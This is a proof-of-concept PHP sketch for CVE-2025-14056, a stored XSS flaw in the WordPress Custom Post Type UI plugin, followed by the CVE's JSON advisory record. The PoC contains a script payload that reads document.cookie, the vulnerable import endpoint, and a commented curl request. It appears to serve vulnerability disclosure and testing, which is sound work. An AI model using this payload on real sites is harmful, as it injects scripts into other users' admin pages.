CVE-2025-14056

<?php /** * CVE-2025-14056 PoC - Custom Post Type UI Stored XSS via label parameter * Requirements: WordPress admin access * Target: Custom Post Type UI plugin <= 1.18.1 */ // XSS payload for the label parameter $xss_payload = '<script>console.log(document.cookie)</script>'; // Step 1: Craft malicious import data with XSS in label field $malicious_import_data = [ 'cpt_custom_post_types' => [ [ 'label' => $xss_payload, 'labelSingular' => 'Test Post Type', 'slug' => 'test-cpt', 'description' => 'Malicious CPT' ] ] ]; // Step 2: Send POST request to import endpoint // POST to: /wp-admin/admin.php?page=cpt_import_export // Parameters: cpt_import (JSON encoded data) // Step 3: Trigger XSS by accessing Tools -> Get Code page // GET: /wp-admin/admin.php?page=cpt_import_export // Example curl command: // curl -X POST "http://target.com/wp-admin/admin.php?page=cpt_import_export" \ // -d "cpt_import=...malicious_json..." // The stored script will execute when any user visits the Tools page. ?>

{"cve": {"id": "CVE-2025-14056", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:47.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom Post Type UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'label' parameter during custom post type import in all versions up to, and including, 1.18.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the Tools → Get Code page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/WebDevStudios/custom-post-type-ui/pull/1014/files#diff-bd3331205024f12a78d74b312bc4f5ad118b5734999bf53a4a95e0959891f60a", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/custom-post-type-ui/tags/1.18.1/inc/tools-sections/tools-post-types.php#L201", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/custom-post-type-ui/trunk/inc/tools-sections/tools-post-types.php#L201", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/890c743e-da5e-46ed-a011-cecd24778163?source=cve", "source": "[email protected]"}]}}